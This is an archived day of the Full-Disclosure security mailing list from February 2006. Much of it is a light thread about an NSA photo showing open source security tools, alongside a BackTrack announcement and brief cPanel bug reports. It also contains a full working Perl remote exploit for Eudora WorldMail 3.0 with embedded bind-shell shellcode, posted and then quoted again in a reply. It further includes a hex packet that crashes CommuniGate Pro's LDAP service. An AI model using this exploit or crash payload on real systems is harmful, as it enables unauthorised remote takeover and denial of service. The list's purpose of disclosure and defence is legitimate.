Re: [Full-disclosure] NSA tracking open source security tools

2006-02-04 Thread TheGesus
> ummm, that page is just:
>
> http://securitywizardry.com/radar.htm
>

Oh, shit that's hilarious!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] cPanel 10 mime/handle.html XSS Vulnerability

2006-02-04 Thread Shell
mime/handle.html of cPanel 10 is vulnerable to an XSS vulnerability.
This can be leveraged by entering an injected html into the extension
and/or mime-type specified. I sucesfully leveraged this issue causing
the page to execute the code alert('hi')
each time.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] NSA tracking open source security tools

2006-02-04 Thread Slythers Bro
this troll is for autist
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] cPanel 10 File Editing Vulnerability

2006-02-04 Thread Andrew Farmer

On 04 Feb 06, at 09:16, Shell wrote:
In cPanel 10, the script "erredit.html," which is supposed to edit  
a specific set of files, can edit any file acessible by the cPanel.


Example:
http://www.example.com:2082/frontend/x/err/erredit.html? 
dir=public_html/&file=index.php


Tested on a real cPanel system running cPanel 10.8.1-RELEASE. This  
won't edit files outside the user's home directory, even with  
traversal paths, and deletes files before writing them - this doesn't  
appear exploitable; indeed, it doesn't seem to be much except a weird  
way of editing your own files.


PGP.sig
Description: This is a digitally signed message part
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] NSA tracking open source security tools

2006-02-04 Thread Jim Popovitch

Jason Coombs wrote:
Sure, it made for a fine photo op. But based on the Bush 
administration's decision-making processes there is good reason to 
believe that A) the people at the NSA who created the mock-ups for 
public relations purposes died unexpectedly and the people who took over 
their jobs didn't know that the intelligence they were looking at was 
meaningless drivel produced for the benefit of manipulating public 
opinion, or B) the NSA is only showing the Bush administration the same 
mock-ups that the rest of us get to see.


C) it's something to put in the background for the media blitz that tags 
along behind the prez.  Surely you don't think that the NSA would allow 
cameras into their real NOC/SOC/POC/FOC/LOC/CROCK


-Jim P.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] NSA tracking open source security tools

2006-02-04 Thread Mike
How do you come to the conclusion that they are tracking open source tools
from that picture?? You could also say they are tracking IDS signatures,
virus signatures, alert con, attacked ports and what time it is in ...

All I see is a webpage and people standing in front of it for a photo op,
"Hey Bush is coming to visit, got anything nice to pull up on the screen for
him?" 

I would also "hope" that the NSA has a much better way of tracking things
than via a 3rd party website.

 What a joke :-)

Mike
www.infosec.co.nz

> -Original Message-
> From: [EMAIL PROTECTED] [mailto:full-disclosure-
> [EMAIL PROTECTED] On Behalf Of Jason Coombs
> Sent: Sunday, February 05, 2006 11:23 AM
> To: Fyodor
> Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] NSA tracking open source security tools
> 
> Fyodor wrote:
> > George Bush visiting the NSA headquarters in Fort Meade.  A wall-sized
> > screen in the background displays the latest versions of our favorite
> > open source security tools, including Nmap, Metasploit, Snort,
> > Ethereal, Cain & Abel, and Kismet.  Nifty.
> 
> The NSA must have learned information security tricks from Microsoft.
> 
> Who in their right mind would focus their attention on software version
> numbers and think that makes for better security?
> 
> Somebody tell the NSA they need to keep track of hash codes instead.
> 
> Regards,
> 
> Jason Coombs
> [EMAIL PROTECTED]
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] NSA tracking open source security tools

2006-02-04 Thread Jason Coombs

[EMAIL PROTECTED] wrote:

it is a neat NOC page to have on a big screen. scares management-type
folk. and Presidents of non democratic countries ;-)


Sure, it made for a fine photo op. But based on the Bush 
administration's decision-making processes there is good reason to 
believe that A) the people at the NSA who created the mock-ups for 
public relations purposes died unexpectedly and the people who took over 
their jobs didn't know that the intelligence they were looking at was 
meaningless drivel produced for the benefit of manipulating public 
opinion, or B) the NSA is only showing the Bush administration the same 
mock-ups that the rest of us get to see.


In either case, the whole show begs the question "Who's really in 
charge?" as well as "What electronic voting equipment manufacturer 
elected THEM President?"


Best,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] BackTrack live CD

2006-02-04 Thread muts
Hi list, 

Remote-Exploit would like to introduce BackTrack - the consolidation of 
the two leading pentesting live CD distributions - Whax and Auditor.
The new distro features the best of both distributions, and lots of nifty
features, including the latest tools and exploits, an appealing interface,
accessibility, and a rich Python development environment.

BackTrack is now in Beta, and can be downloaded from 
http://www.remote-exploit.org/

Mati Aharoni & Max Moser

www.remote-exploit.org  


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] NSA tracking open source security tools

2006-02-04 Thread Mike Hoye
On Sun, Feb 05, 2006 at 11:23:10AM +1300, Jason Coombs wrote:
> Fyodor wrote:
> >George Bush visiting the NSA headquarters in Fort Meade.  A wall-sized
> >screen in the background displays the latest versions of our favorite
> >open source security tools, including Nmap, Metasploit, Snort,
> >Ethereal, Cain & Abel, and Kismet.  Nifty.
> 
> The NSA must have learned information security tricks from Microsoft.
> Who in their right mind would focus their attention on software version 
> numbers and think that makes for better security?

Or, alternatively, it was just a quickly ginned-up background made to
look "high-tech" for the President's visit. Yeah, it's stupid to have
version numbers scrolling by on the screen as useful information, but
it's even dumber to think that the NSA would put live, or even important,
data on the screen during a freaking photo op, with the press all over
the place.

-- 
"After a while, the hanged man will become motionless and his gallows
will oscillate as if its fulcrum were the hanged man." - Mario Salvadori,
Columbia University, 1984.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] NSA tracking open source security tools

2006-02-04 Thread A . L . M . Buxey
Hi,

> > to track Nmap release status.  And apparently they are doing so :).
> > The latest (February 6) issue of Newsweek has a picture on page 39 of
> > George Bush visiting the NSA headquarters in Fort Meade.  A wall-sized

ummm, that page is just:

http://securitywizardry.com/radar.htm


it is a neat NOC page to have on a big screen. scares management-type
folk. and Presidents of non democratic countries ;-)

alan
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] NSA tracking open source security tools

2006-02-04 Thread Jason Coombs

Fyodor wrote:

George Bush visiting the NSA headquarters in Fort Meade.  A wall-sized
screen in the background displays the latest versions of our favorite
open source security tools, including Nmap, Metasploit, Snort,
Ethereal, Cain & Abel, and Kismet.  Nifty.


The NSA must have learned information security tricks from Microsoft.

Who in their right mind would focus their attention on software version 
numbers and think that makes for better security?


Somebody tell the NSA they need to keep track of hash codes instead.

Regards,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (OLD) Eudora WorldMail 3.0 Windows 2000 Remote System Exploit

2006-02-04 Thread Robert Kim Wireless Internet Advisor
what is this in response to? - bob

On 2/4/06, markus magnus <[EMAIL PROTECTED]> wrote:
> ###
> ### Eudora WorldMail 3.0 Windows 2000 Remote System
> Exploit
> ### November 2005
> ###
> ### Tested on Windows 2000 Server SP4
> ###
> ### info(AT)com-winner.com
> ### http://www.com-winner.com
> ### http://www.com-winner.com/CWCOM/cwc-index/
> ###
>
> use IO::Socket::INET;
> use strict;
>
> # win32_bind -  EXITFUNC=seh LPORT= Size=344
> Encoder=PexFnstenvSub http://metasploit.com
> my $shellcode =
> "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x63".
> "\x88\xf7\xf7\x83\xeb\xfc\xe2\xf4\x9f\xe2\x1c\xba\x8b\x71\x08\x08".
> "\x9c\xe8\x7c\x9b\x47\xac\x7c\xb2\x5f\x03\x8b\xf2\x1b\x89\x18\x7c".
> "\x2c\x90\x7c\xa8\x43\x89\x1c\xbe\xe8\xbc\x7c\xf6\x8d\xb9\x37\x6e".
> "\xcf\x0c\x37\x83\x64\x49\x3d\xfa\x62\x4a\x1c\x03\x58\xdc\xd3\xdf".
> "\x16\x6d\x7c\xa8\x47\x89\x1c\x91\xe8\x84\xbc\x7c\x3c\x94\xf6\x1c".
> "\x60\xa4\x7c\x7e\x0f\xac\xeb\x96\xa0\xb9\x2c\x93\xe8\xcb\xc7\x7c".
> "\x23\x84\x7c\x87\x7f\x25\x7c\xb7\x6b\xd6\x9f\x79\x2d\x86\x1b\xa7".
> "\x9c\x5e\x91\xa4\x05\xe0\xc4\xc5\x0b\xff\x84\xc5\x3c\xdc\x08\x27".
> "\x0b\x43\x1a\x0b\x58\xd8\x08\x21\x3c\x01\x12\x91\xe2\x65\xff\xf5".
> "\x36\xe2\xf5\x08\xb3\xe0\x2e\xfe\x96\x25\xa0\x08\xb5\xdb\xa4\xa4".
> "\x30\xdb\xb4\xa4\x20\xdb\x08\x27\x05\xe0\xe6\xab\x05\xdb\x7e\x16".
> "\xf6\xe0\x53\xed\x13\x4f\xa0\x08\xb5\xe2\xe7\xa6\x36\x77\x27\x9f".
> "\xc7\x25\xd9\x1e\x34\x77\x21\xa4\x36\x77\x27\x9f\x86\xc1\x71\xbe".
> "\x34\x77\x21\xa7\x37\xdc\xa2\x08\xb3\x1b\x9f\x10\x1a\x4e\x8e\xa0".
> "\x9c\x5e\xa2\x08\xb3\xee\x9d\x93\x05\xe0\x94\x9a\xea\x6d\x9d\xa7".
> "\x3a\xa1\x3b\x7e\x84\xe2\xb3\x7e\x81\xb9\x37\x04\xc9\x76\xb5\xda".
> "\x9d\xca\xdb\x64\xee\xf2\xcf\x5c\xc8\x23\x9f\x85\x9d\x3b\xe1\x08".
> "\x16\xcc\x08\x21\x38\xdf\xa5\xa6\x32\xd9\x9d\xf6\x32\xd9\xa2\xa6".
> "\x9c\x58\x9f\x5a\xba\x8d\x39\xa4\x9c\x5e\x9d\x08\x9c\xbf\x08\x27".
> "\xe8\xdf\x0b\x74\xa7\xec\x08\x21\x31\x77\x27\x9f\x93\x02\xf3\xa8".
> "\x30\x77\x21\x08\xb3\x88\xf7\xf7";
>
> sub usage {
>print "usage: perl Worldmail.pl serverip\n";
> }
>
> print "Worldmail.pl\nEudora WorldMail Server REMOTE
> SYSTEM EXPLOIT\n";
> if ($#ARGV < 0) {
>usage();
>exit();
> }
>
> my $host=$ARGV[0];
> my $sock = IO::Socket::INET->new(PeerAddr => $host,
> PeerPort => 143,
> Proto=> 'tcp');
>
> my $nops="\x90" x 10;
>
> my $ret="\xfd\x2b\x9a\x01"; # call ebx in worldmail
> 3.0 cram.dll
> my $x = $nops . $shellcode . ("A" x 427) . "\xeb\x04"
> . $ret . "\xe9\xeb\xfc\xff\xff";
>
> print $sock "A003 APPEND saved-messages (\Seen)
> {\"$x\"}\r\n";
>
> print "\nNow telnet to remote host on port ...\n";
>
> while (1) {
>$a=<$sock>;
> }
>
>
>
>
>
>
> ___
> Telefonate ohne weitere Kosten vom PC zum PC: http://messenger.yahoo.de
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


--
Robert Q Kim, Wireless Internet Advisor
http://hsdpa-coverage.com
http://www.antennacoverage.com/cell-repeater.html
https://www.antennacoverage.com/cell-phone-antenna-booster.html

2611 S. Pacific Coast Highway 101
Suite 102
Cardiff by the Sea, CA 92007
206 984 0880
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] (OLD) Eudora WorldMail 3.0 Windows 2000 Remote System Exploit

2006-02-04 Thread markus magnus
###
### Eudora WorldMail 3.0 Windows 2000 Remote System
Exploit
### November 2005
###
### Tested on Windows 2000 Server SP4
###
### info(AT)com-winner.com
### http://www.com-winner.com
### http://www.com-winner.com/CWCOM/cwc-index/
###

use IO::Socket::INET;
use strict;

# win32_bind -  EXITFUNC=seh LPORT= Size=344
Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x63".
"\x88\xf7\xf7\x83\xeb\xfc\xe2\xf4\x9f\xe2\x1c\xba\x8b\x71\x08\x08".
"\x9c\xe8\x7c\x9b\x47\xac\x7c\xb2\x5f\x03\x8b\xf2\x1b\x89\x18\x7c".
"\x2c\x90\x7c\xa8\x43\x89\x1c\xbe\xe8\xbc\x7c\xf6\x8d\xb9\x37\x6e".
"\xcf\x0c\x37\x83\x64\x49\x3d\xfa\x62\x4a\x1c\x03\x58\xdc\xd3\xdf".
"\x16\x6d\x7c\xa8\x47\x89\x1c\x91\xe8\x84\xbc\x7c\x3c\x94\xf6\x1c".
"\x60\xa4\x7c\x7e\x0f\xac\xeb\x96\xa0\xb9\x2c\x93\xe8\xcb\xc7\x7c".
"\x23\x84\x7c\x87\x7f\x25\x7c\xb7\x6b\xd6\x9f\x79\x2d\x86\x1b\xa7".
"\x9c\x5e\x91\xa4\x05\xe0\xc4\xc5\x0b\xff\x84\xc5\x3c\xdc\x08\x27".
"\x0b\x43\x1a\x0b\x58\xd8\x08\x21\x3c\x01\x12\x91\xe2\x65\xff\xf5".
"\x36\xe2\xf5\x08\xb3\xe0\x2e\xfe\x96\x25\xa0\x08\xb5\xdb\xa4\xa4".
"\x30\xdb\xb4\xa4\x20\xdb\x08\x27\x05\xe0\xe6\xab\x05\xdb\x7e\x16".
"\xf6\xe0\x53\xed\x13\x4f\xa0\x08\xb5\xe2\xe7\xa6\x36\x77\x27\x9f".
"\xc7\x25\xd9\x1e\x34\x77\x21\xa4\x36\x77\x27\x9f\x86\xc1\x71\xbe".
"\x34\x77\x21\xa7\x37\xdc\xa2\x08\xb3\x1b\x9f\x10\x1a\x4e\x8e\xa0".
"\x9c\x5e\xa2\x08\xb3\xee\x9d\x93\x05\xe0\x94\x9a\xea\x6d\x9d\xa7".
"\x3a\xa1\x3b\x7e\x84\xe2\xb3\x7e\x81\xb9\x37\x04\xc9\x76\xb5\xda".
"\x9d\xca\xdb\x64\xee\xf2\xcf\x5c\xc8\x23\x9f\x85\x9d\x3b\xe1\x08".
"\x16\xcc\x08\x21\x38\xdf\xa5\xa6\x32\xd9\x9d\xf6\x32\xd9\xa2\xa6".
"\x9c\x58\x9f\x5a\xba\x8d\x39\xa4\x9c\x5e\x9d\x08\x9c\xbf\x08\x27".
"\xe8\xdf\x0b\x74\xa7\xec\x08\x21\x31\x77\x27\x9f\x93\x02\xf3\xa8".
"\x30\x77\x21\x08\xb3\x88\xf7\xf7";

sub usage {
print "usage: perl Worldmail.pl serverip\n";
}

print "Worldmail.pl\nEudora WorldMail Server REMOTE
SYSTEM EXPLOIT\n";
if ($#ARGV < 0) {
usage();
exit(); 
}

my $host=$ARGV[0];
my $sock = IO::Socket::INET->new(PeerAddr => $host,
 PeerPort => 143,
 Proto=> 'tcp');

my $nops="\x90" x 10;

my $ret="\xfd\x2b\x9a\x01"; # call ebx in worldmail
3.0 cram.dll
my $x = $nops . $shellcode . ("A" x 427) . "\xeb\x04"
. $ret . "\xe9\xeb\xfc\xff\xff";

print $sock "A003 APPEND saved-messages (\Seen)
{\"$x\"}\r\n";

print "\nNow telnet to remote host on port ...\n";

while (1) {
$a=<$sock>;
}






___ 
Telefonate ohne weitere Kosten vom PC zum PC: http://messenger.yahoo.de
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] ProtoVer LDAP vs CommuniGate Pro 5.0.7

2006-02-04 Thread Evgeny Legerov
I. DESCRIPTION

CommuniGate Pro Core Server from CommuniGate Systems provides robust 
cross-platform 
groupware applications, enabling a cost effective, easy to manage 
communications platform. 

For more info visit http://www.stalker.com

II. DETAILS

ProtoVer LDAP testsuite v1.5 uncovered critical Denial of Service vulnerability
in LDAP component of CommuniGate Pro Server 5.0.7 

The vulnerability could be used by a remote unauthenticated attacker to crash 
the server.

Example debug session is below.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1458242640 (LWP 25554)]
0x080fa008 in VDirectoryFile::findParentDN ()
(gdb) backtrace
#0  0x080fa008 in VDirectoryFile::findParentDN ()
#1  0x080fa031 in VDirectoryFile::findParentDN ()
...
#353 0x080fa031 in VDirectoryFile::findParentDN ()
#354 0x080fcc6f in VDirectoryFile::findRecords ()
#355 0x080efc23 in VDirectory::findDirectoryRecords ()
#356 0x081b09b3 in VLDAPInput::processInput ()
#357 0x082cb5a3 in VStream::worker ()
#358 0x082cc419 in VStream::starter ()
#359 0x0839c369 in STThreadStarter ()
#360 0xa9a09b80 in start_thread () from /lib/libpthread.so.0
#361 0xa9976dee in clone () from /lib/libc.so.6

To reproduce the vulnerability, send the following data to LDAP port:
"""
 30 82 02 38 02 01 01 63 82 02 31 04 82 02 15 64
 63 3d 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 64 63 3d 65 78 61 6d 70 6c 65 2c 64 63
 3d 63 6f 6d 0a 01 02 0a 01 00 02 01 00 02 01 00
 01 01 00 a2 05 87 03 66 6f 6f 30 00
"""

III. VENDOR RESPONSE

The vendor has released 5.0.8 version which addresses this issue.

Quote from http://www.stalker.com/CommuniGatePro/History.html:

"""
5.0.8 03-Feb-06
* Directory: DN processing changed to avoid problems with DNs containing 
too many (>100) elements.
"""

IV. CREDIT

The vulnerability has been found using GLEG Ltd's ProtoVer LDAP testsuite:
http://www.gleg.net/protover_ldap.shtml

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] NSA tracking open source security tools

2006-02-04 Thread Paul Schmehl

--On February 4, 2006 1:21:41 AM -0800 Fyodor <[EMAIL PROTECTED]> wrote:


Of the recent U.S. political scandals, one of the most divisive is the
issue of President Bush (IMHO illegally) authorizing the NSA to
conduct warantless wiretaps on Americans' phone calls and emails.
While I don't like the NSA tracking my phone calls, they are welcome
to track Nmap release status.  And apparently they are doing so :).
The latest (February 6) issue of Newsweek has a picture on page 39 of
George Bush visiting the NSA headquarters in Fort Meade.  A wall-sized
screen in the background displays the latest versions of our favorite
open source security tools, including Nmap, Metasploit, Snort,
Ethereal, Cain & Abel, and Kismet.  Nifty.  For those
without the magazine, I have posted a pic at:

Soyou think what the NSA is doing is illegal and you don't like them 
tracking your phone calls (why would they be?  Are you talking to bin 
Laden?), but you think that them using tools that can be used to 
successfully hack computer networks is "nifty"?


No double standard there, huh?  :-)

Love Nmap, BTW.  Great tool.  Thanks for writing and consistently 
maintaining it.


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] cPanel 10 File Editing Vulnerability

2006-02-04 Thread Shell
In cPanel 10, the script "erredit.html," which is supposed to edit a
specific set of files, can edit any file acessible by the cPanel.

Example:
http://www.example.com:2082/frontend/x/err/erredit.html?dir=public_html/&file=index.php
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] zepcom001

2006-02-04 Thread Leif Ericksen
HUMMM To me that looks like a binary file being sent to the printer or
lp or lpd device...  Normally it is a bad idea to send binary files to
the printers because they do not know how to deal with such files.
Security risk maybe.  Just means you have stupid users if they are going
to send binaries to a printer.  After all it will cause may one or two
lines of junk to be printed if not the entire page, and maybe even so
much junk that it makes the printer run out of paper.  Kill the job
reset the printer wait for next stupid user.

rather than using /ntldr or /kernel 
build your own binary and print it.

On Sat, 2006-02-04 at 06:29 +0100, [EMAIL PROTECTED] wrote:
> 
> 
> 

> zepcom-001.txt
> Hello dear readers and welcome to our fist advisory!
> we have found a ressurse exarstion bog in notepad and assosiated 
> ressurses.
> if u have a printer and u type start and run and type notepad and 
> then you type
> NOTEPAD.EXE /P C:\NTLDR and not make mutex_a to prevent dedflock
> then your PRINTER will run OUT of PAPER! this is bad!!
> This is a serrius ressurse starvation of big company if they print 
> regnings
> or other important papers. This has been veriffied on:
> 
> windows NT ( UNTESTED )
> 
> windows 2000 sp0
> windows 2000 sp1
> windows 2000 sp2
> windows 2000 sp3
> windows 2000 sp4
> windows 2000 sp5
> windows 2000 sp6
> 
> windows XP sp0
> windows XP sp1
> windows XP sp2
> windows XP sp3
> 
> AND OPEN SOURC EALSO HAS PROBLEM WITH CAT 
> IF you use cat and feed to telnet and port 90+00 of
> print server and put to /kernel then you can kill the printer!
> This can be very serius flav for big billing company

-- 
Leif Ericksen <[EMAIL PROTECTED]>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] NSA tracking open source security tools

2006-02-04 Thread Peter Bruderer
On Sat, 2006-02-04 at 07:36 -0500, TheGesus wrote:
> The NSA wrote libpcap in the first place.
> 
> Takes one to know one, I guess. :-)

The NRG (Network Research Group) of the ICSD (Information and Computing
Sciences Division) at LBNL (Lawrence Berkeley National laboratory) in
Berkeley, California actually wrote libpcap. And other nice tools, like
tcpdump, traceroute, 

http://www-nrg.ee.lbl.gov/

That was at least true one or two decades ago.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] NSA tracking open source security tools

2006-02-04 Thread TheGesus
On 2/4/06, Fyodor <[EMAIL PROTECTED]> wrote:
> Of the recent U.S. political scandals, one of the most divisive is the
> issue of President Bush (IMHO illegally) authorizing the NSA to
> conduct warantless wiretaps on Americans' phone calls and emails.
> While I don't like the NSA tracking my phone calls, they are welcome
> to track Nmap release status.  And apparently they are doing so :).
> The latest (February 6) issue of Newsweek has a picture on page 39 of
> George Bush visiting the NSA headquarters in Fort Meade.  A wall-sized
> screen in the background displays the latest versions of our favorite
> open source security tools, including Nmap, Metasploit, Snort,
> Ethereal, Cain & Abel, and Kismet.  Nifty.  For those
> without the magazine, I have posted a pic at:
>
> http://www.insecure.org/nmap/nmap_inthenews.html#bush
>
> Maybe open source software really will take over the world :).
>

The NSA wrote libpcap in the first place.

Takes one to know one, I guess. :-)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] NSA tracking open source security tools

2006-02-04 Thread Fyodor
Of the recent U.S. political scandals, one of the most divisive is the
issue of President Bush (IMHO illegally) authorizing the NSA to
conduct warantless wiretaps on Americans' phone calls and emails.
While I don't like the NSA tracking my phone calls, they are welcome
to track Nmap release status.  And apparently they are doing so :).
The latest (February 6) issue of Newsweek has a picture on page 39 of
George Bush visiting the NSA headquarters in Fort Meade.  A wall-sized
screen in the background displays the latest versions of our favorite
open source security tools, including Nmap, Metasploit, Snort,
Ethereal, Cain & Abel, and Kismet.  Nifty.  For those
without the magazine, I have posted a pic at:

http://www.insecure.org/nmap/nmap_inthenews.html#bush

Maybe open source software really will take over the world :).

Cheers,
Fyodor

PS: For those who missed the announcement, Nmap 4.0 is now available:
http://www.insecure.org/stf/Nmap-4.00-Release.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/